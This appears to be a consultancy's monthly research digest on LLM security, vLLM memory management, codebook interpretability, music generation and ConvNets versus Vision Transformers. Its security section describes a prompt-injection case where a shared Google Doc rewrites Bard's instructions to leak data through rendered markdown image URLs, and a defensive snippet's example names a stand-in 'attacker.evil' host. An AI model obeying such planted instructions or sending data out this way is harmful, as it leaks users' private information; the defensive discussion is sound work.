Research Echoes #9

The Dark Sides of LLMs: Paths to Optimize and Explain Them

Updates on the security, performance, and interpretability of language models; and as a bonus: generative AI in music, and the battle between convolutions and transformers.

#Security #Interpretability #Optimization #Language Models #Methodology


  • If you only have a minute to read now, here are the key points of this article:
  1. Language models (especially ChatGPT) have serious security vulnerabilities that must be addressed.
  2. A new framework for optimizing language models has been released; it tackles their memory consumption, which is crucial to keep under control.
  3. New work on the interpretability of language models has been published by Stanford. It proposes modifying the fundamental architecture so that concepts within the model can be discovered, and then exploited, more easily.
  4. Researchers at DeepMind have demonstrated that, contrary to the current consensus, Vision Transformers are not "better" than convolutional networks for large datasets.
  • Why can reading this article be of concrete use to you?

Concretely, this article provides a strong alert about the security of language models, a new optimization framework for these models allowing significant cost savings on hardware, and promising new work on interpretability of these models. Additionally, it offers some general knowledge on generative AI in music, and a new step towards determining which architecture is most interesting in image processing.

  • What can you tell a colleague or your boss about it?

The dark side of LLMs at the moment is security, as cases of data exfiltration through prompt injection are emerging. LLMs are nevertheless progressing on performance and cost of use, particularly in the cloud, as well as on interpretability, so that they are no longer black boxes and their behavior becomes more explainable.

  • In short, what key concepts will be covered?
  • Security of language models, especially ChatGPT / Google Bard
  • Optimizing language model usage through memory optimization
  • Interpretability of language models by design
  • Generative AI in music and the importance of datasets
  • Choosing between a convolutional model and a Vision Transformer in image processing
  • Which business processes are likely to be modified based on this research?
  • The security of a service using a language model
  • The cost of using a language model
  • The choice of a fundamental model for an image processing task
  • Which use cases have we developed for clients that relate to the topics of this research echo?

We have developed a classification system using language models (LLMs) to assess the toxicity of messages posted on a high-volume internal messaging platform.

Our optimization efforts have enabled us to achieve a 30-fold reduction in processing time between the initial version and the currently operational version.

Regarding security, we have customized a language model installed on our client's servers to ensure that no data is transmitted over the web.

Here we go...

As we do every month, we present the academic research from the past month that we find interesting and useful for short-term deployment.

On the agenda:

  • The (low) security of language models like ChatGPT,
  • Low-level optimization of these models with a highly relevant new framework,
  • A new interpretability work on these models from Stanford,
  • Then, setting language processing aside, a new generative model in music,
  • And finally, the war between convolutional networks and Vision Transformers.

Language models and cybersecurity: a disaster waiting to happen

Language models have been making headlines ever since the release of ChatGPT and other related works (LLaMA, Falcon, Mistral, etc.). More and more projects with our clients aim to leverage these tools to create new services built on natural language. While these models indeed represent a small revolution in terms of potential applications, it must be acknowledged that they are still too recent to be deployed confidently in an information system, or even to be used properly. We have already extensively discussed the challenges of industrializing a Deep Learning model, one of our daily battles. Here, we propose to focus on the cybersecurity issues of these models.

Indeed, cybersecurity doesn't mix very well with Deep Learning. Between model inversion, dataset poisoning, and adversarial attacks, the attack vectors against these models are numerous and still poorly understood by players in the field. But beyond that, large language models open up a whole new field of risks that we didn't even suspect... At the root of the problem, once again, lie the limits of our theoretical understanding of these models, which are just, bluntly, "way too big" to be properly mastered.

A blog recently caught our attention: https://embracethered.com/blog/posts/. It focuses on these language model vulnerabilities and their consequences. While we recommend the entire blog, the last two articles are particularly enlightening.

Specifically: https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/

In this article, the author demonstrates that the automation allowing Bard (Google's LLM) to fetch information from the user's Google Documents makes it quite simple to perform a prompt injection, notably by sharing a document with a user (an action that requires no validation from the victim!). This document contains a prompt that rewrites the LLM's instructions, causing it to exfiltrate information to a malicious server... Below (taken from the blog) is the document in question:

One will note with a bit of humor that the requests from the "legal department" are very important 🙂. Beyond that, we find that controlling a model via prompt is a very weak and limited form of control, easily susceptible to exploitation. If you combine this approach with prompt obfuscation techniques (typically, the cipher presented in a recent research review), it will become nearly impossible to detect this type of attack. That said, let's give credit to Google for addressing this vulnerability (only in this specific form...).
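
In this case, the exfiltration relied on the chat interface automatically rendering a markdown image whose URL carried the stolen data. As a purely illustrative, hedged sketch (not Google's actual fix, and the allow-list domain below is a placeholder), one possible defensive layer is to strip untrusted image references from the model's output before rendering it:

```python
import re

# Hypothetical mitigation sketch: before rendering an LLM answer as markdown,
# drop image references pointing to domains outside an allow-list, since
# auto-loaded images are a classic channel for exfiltrating data via the URL.
ALLOWED_DOMAINS = {"example-internal.com"}  # assumption: your own trusted hosts

MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://([^/\s)]+)[^\s)]*)\)")

def strip_untrusted_images(markdown: str) -> str:
    def _replace(match: re.Match) -> str:
        domain = match.group(2).lower()
        return match.group(0) if domain in ALLOWED_DOMAINS else "[image removed]"
    return MD_IMAGE.sub(_replace, markdown)

print(strip_untrusted_images("See ![](https://attacker.evil/q?data=secret)"))
# -> "See [image removed]"
```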

And let's note that the author has raised similar issues with ChatGPT, which, according to OpenAI itself, will not be resolved:

https://embracethered.com/blog/posts/2023/advanced-plugin-data-exfiltration-trickery/

Optimization of language models has a new framework!

The second piece of work (this time academic) that we want to present today concerns the optimization of language models, whether for training or inference.

It's now a well-known problem for anyone who has tried to work with these models: their sheer size makes them very costly to use. Naively, training these models requires several particularly expensive A100 GPUs, and even simply using them (inference) incurs costs and constraints that are hard to bear.

In Efficient Memory Management for Large Language Model Serving with PagedAttention by Kwon et al. (Berkeley), the authors propose a refreshing approach to this problem and even provide a ready-to-use framework:

https://arxiv.org/abs/2309.06180

The fundamental idea of vLLM is to step away from the purely academic approach and go back to computer science principles, in particular the management of GPU memory, which, to date, remains too simplistic. Among the problems highlighted by the authors is the fact that, for every request, an LLM serving system allocates a contiguous memory block of the maximum size needed to generate the longest possible sentence. In the majority of cases, however, most of this memory space is never used. We are facing a classic memory-fragmentation problem, where a significant portion of memory is allocated (and therefore blocked) but unused. The authors focus in particular on the KV cache, a central element in optimizing Transformer-type models. The diagram below shows the different memory allocations, in particular between Orca (a previous approach, here (caution) re-implemented by the authors) and their approach:

The diagram below illustrates the fragmentation issue with sentences during prediction:

Without delving too much into technical details, the authors propose implementing a block-based virtual memory manager, with logical virtual blocks corresponding to the operation of the LLM on one side, and physical blocks optimizing available memory on the other side.
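
To make the idea concrete, here is a deliberately naive sketch of such a block table in Python (our illustration only, not vLLM's actual implementation): physical blocks are drawn from a shared pool only when the sequence actually needs them, rather than being reserved up front for the longest possible output.

```python
# Minimal sketch of the paged KV-cache idea: the sequence sees contiguous
# *logical* blocks, while *physical* blocks are allocated on demand from a
# shared pool, so no memory is reserved for tokens that are never generated.
BLOCK_SIZE = 16  # tokens per block (illustrative value)

class BlockManager:
    def __init__(self, num_physical_blocks: int):
        self.free_blocks = list(range(num_physical_blocks))
        self.block_tables: dict[int, list[int]] = {}  # seq_id -> physical block ids

    def append_token(self, seq_id: int, seq_len: int) -> None:
        """Allocate a new physical block only when the last one is full."""
        table = self.block_tables.setdefault(seq_id, [])
        if seq_len % BLOCK_SIZE == 1 or not table:  # first token of a new block
            table.append(self.free_blocks.pop())

    def free(self, seq_id: int) -> None:
        self.free_blocks.extend(self.block_tables.pop(seq_id, []))

manager = BlockManager(num_physical_blocks=1024)
for position in range(1, 40):          # generate 39 tokens for sequence 0
    manager.append_token(seq_id=0, seq_len=position)
print(len(manager.block_tables[0]))    # 3 blocks used, instead of a worst-case reservation
```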

They further develop this approach to show how to handle multiple requests in parallel, generate multiple candidate completions for the same sentence, or share blocks between requests that use the same prompt (which is particularly relevant, as LLM usage is in most cases based on a constant prompt repeated each time, especially when implementing a Chain of Thought).
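
For reference, the framework released with the paper (vLLM) exposes a simple generation interface. The snippet below is a hedged sketch of typical usage: the model name and sampling values are placeholders to adapt to your setup, and the project documentation remains the authority on the exact API.

```python
# Hedged usage sketch of the vLLM library released with the paper.
from vllm import LLM, SamplingParams

prompts = [
    "Summarize the following support ticket: ...",
    "Summarize the following support ticket: ...",  # shared prefix: blocks can be reused
]
sampling = SamplingParams(n=2, temperature=0.8, max_tokens=128)  # 2 candidates per prompt

llm = LLM(model="facebook/opt-125m")   # small public model, purely as an example
outputs = llm.generate(prompts, sampling)
for out in outputs:
    for candidate in out.outputs:
        print(candidate.text)
```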

This type of work is beneficial in that it moves away from the "Deep Learning" paradigm to apply a certain "common sense" approach to development and computer optimization.

A bit more interpretability for LLMs

The interpretability of Deep Learning is still a fascinating and elusive topic, and we must follow relevant research in this field if we want to properly industrialize neural networks. Our latest research review addressed two interesting new works focused on language models. Stanford has recently published another piece that deserves proper attention, despite (as always :/) numerous limitations.

In Codebook Features: Sparse and Discrete Interpretability for Neural Networks by Tamkin et al. [https://arxiv.org/abs/2310.17230], the authors revisit the goal of interpreting the intermediate values of the network's "neurons" (in other words, the values produced by the activation mechanisms). The fundamental problems, however, have not changed: there are far too many values, and we know that it is combinations of activations that must be considered, which further complicates (or even makes impossible) this task.

Here, the authors propose a different approach by strongly constraining the structure of the neural network. The idea is to replace the intermediate states containing "free" numerical values with a combination (by sum) of a finite number of static codes. The goal is therefore, through optimization, to replace the traditional layers with Codebook Feature layers, which contain these static codes and return elements whose sum is as close as possible to the actual activation.
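
As a hedged sketch of our reading of the idea (simplified: training also requires a straight-through gradient trick, omitted here), such a layer keeps only the sum of the k codes most similar to the incoming activation:

```python
import torch
import torch.nn as nn

class CodebookLayer(nn.Module):
    """Simplified sketch of a codebook feature layer: each activation vector
    is replaced by the sum of its k most similar codes."""
    def __init__(self, num_codes: int, dim: int, k: int = 8):
        super().__init__()
        self.codes = nn.Parameter(torch.randn(num_codes, dim))
        self.k = k

    def forward(self, activations: torch.Tensor) -> torch.Tensor:
        # cosine similarity between activations (..., dim) and every code
        sims = nn.functional.normalize(activations, dim=-1) @ \
               nn.functional.normalize(self.codes, dim=-1).T
        top_idx = sims.topk(self.k, dim=-1).indices   # (..., k)
        return self.codes[top_idx].sum(dim=-2)        # sum of the chosen codes

layer = CodebookLayer(num_codes=1024, dim=64)
hidden = torch.randn(2, 10, 64)        # (batch, tokens, dim)
quantized = layer(hidden)              # same shape, but built from discrete codes
print(quantized.shape)                 # torch.Size([2, 10, 64])
```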

It's interesting for several reasons :

  • Firstly, we recall the work in the last research review where the authors learned sparse encoding of activations with interesting results. One can view this new work as a strong evolution. Whereas before, we started from these activations to discover the simplest possible combinations, here, the simplification is applied directly to the model.
  • This work is reminiscent of research on the VQ-VAE (Vector Quantized Variational Autoencoder), which has yielded excellent results since 2017, for example in generative modeling (Stable Diffusion) for learning an exploitable latent space on images.

The challenge here is then to discover which concepts are modeled by which codes. The authors first work on a trivial case, then study a relatively simple language model. They manage to identify concepts associated with codes, and also to manipulate these codes to force the concept in question to appear in an ongoing prediction (see the diagram below, where the code identifying dragons is added to every prediction).
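
Reusing the CodebookLayer sketch above, such an intervention could look like the following (a deliberate simplification of the paper's code intervention; the code index is a placeholder for a code whose concept has been identified beforehand):

```python
import torch

DRAGON_CODE_ID = 42  # placeholder: index of a code previously associated with a concept

def forward_with_intervention(layer: CodebookLayer, activations: torch.Tensor) -> torch.Tensor:
    # Simplified steering: add the chosen concept code to every quantized activation,
    # so the concept is injected at each generation step.
    return layer(activations) + layer.codes[DRAGON_CODE_ID]
```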

What's interesting here is that the model is naturally much simpler to study thanks to this "quantization," but more importantly, the approach does not prevent the model from being an effective language model in the general sense. It is therefore particularly relevant, even though the models studied remain relatively simple compared to the very large models we usually deal with...

A bit of music in this rough world

Generative AI has definitely taken off in the world of images (and video is coming very soon, with the very recent release of the Video Diffusion Model), but its application to music remains more complex and much less satisfying. Therefore, any new work with relevant results deserves to be followed.

This is the case with the very recent MusTango by Melechovsky et al. [https://arxiv.org/abs/2311.08355]. We won't delve too much into the model itself, which follows the classics of Stable Diffusion: a VAE to transfer the music into a simpler latent space, a diffusion model conditioned by text, and the good old HiFi-GAN to improve quality. No, the most interesting aspect here is probably the data management, which likely led to much better results than previous works.

Indeed, a fundamental challenge here is to have a large dataset of music coupled with rich and varied descriptive texts. While such a dataset exists "easily" for images, it is much more complex, if not impossible, to build in the music world. The Internet contains far fewer annotated music samples than annotated images, and the quality of textual descriptions in music is also much lower than in images.

The authors therefore decided to create a new, freely accessible dataset, following an approach similar to what we often do for our clients. Starting from MusicCaps (an existing dataset), they generated descriptive texts based on automatic detections: chord progressions, instruments, bpm. They also "augmented" the dataset by modifying the music samples (tempo variations, pitch variations, etc.). Finally, ChatGPT was used to create natural-language variations of the descriptions based on the detected values...
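
As a hedged illustration of this kind of audio augmentation (our own sketch, not the authors' pipeline; the file name is a placeholder), a few lines of librosa are enough to derive pitch- and tempo-shifted variants whose captions can then be rephrased by an LLM:

```python
import librosa

# Illustrative augmentation: derive new (audio, description) pairs by shifting
# pitch and stretching tempo, then have an LLM rephrase the caption accordingly.
y, sr = librosa.load("example_clip.wav", sr=None)            # placeholder file name

pitched = librosa.effects.pitch_shift(y, sr=sr, n_steps=2)   # up two semitones
faster = librosa.effects.time_stretch(y, rate=1.1)           # ~10% faster tempo

tempo, _ = librosa.beat.beat_track(y=faster, sr=sr)          # re-estimate bpm for the caption
print("estimated bpm of the augmented clip:", tempo)
```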

The CNN/ViT war continues! (or beware of the academy, chapter 289)

Since 2020, a new model architecture has emerged to handle images, the now-famous Vision Transformer, adopting the fundamental architecture that has proven successful in natural language processing. And since then, the vast majority of researchers have shifted to these new models, abandoning the good old convolutional models that we have been using since 2012.

The argument for switching models has long been that the Vision Transformer was much more effective. However, the ViT was shown to be more effective only on very large datasets, such as Google's JFT-300M, which contains roughly 300 million annotated images. Let's remember that this paradigm is far from the reality of our projects, where our clients' datasets rarely exceed one million elements. Moreover, since 2020, several works (such as https://arxiv.org/abs/2201.09792 or https://arxiv.org/abs/2201.03545) have challenged this understanding by proposing convolutional architectures that perform on par with Vision Transformers.

The academic consensus has long been that Vision Transformers were much better at scaling, i.e., at handling larger datasets, whereas, for a more classical problem, convolutional networks were roughly equivalent. Hence the trend of pre-training ViT models on massive datasets and then adapting them to more applied cases with less data...

It is worth noting that we continue, when appropriate, to use convolutional architectures for our clients. Indeed, these architectures have a much more solid track record, making their manipulation, control, and analysis (interpretability?) much more effective. It's better to lose a few percentage points of quality in exchange for a lighter and better-constrained model, once we step out of the academic paradigm (where state-of-the-art research prevails) to develop useful tools.

Well, this war has just seen a new confrontation, and it's no small matter, as it comes directly from DeepMind, a key player and influencer in the field. In the short paper ConvNets Match Vision Transformers at Scale by Smith et al. [https://arxiv.org/abs/2310.16764], the authors challenge this belief and demonstrate that convolutional networks can be perfectly competitive with Vision Transformers on large datasets. While these findings are not intended to be applied directly (unless one of our clients unlocks a budget of several hundred thousand euros for training), they serve as a reminder of the right approach to Deep Learning: keep up with research, but always maintain enough perspective not to rush into "trends" whose cost is not justified by the quality of the tools produced.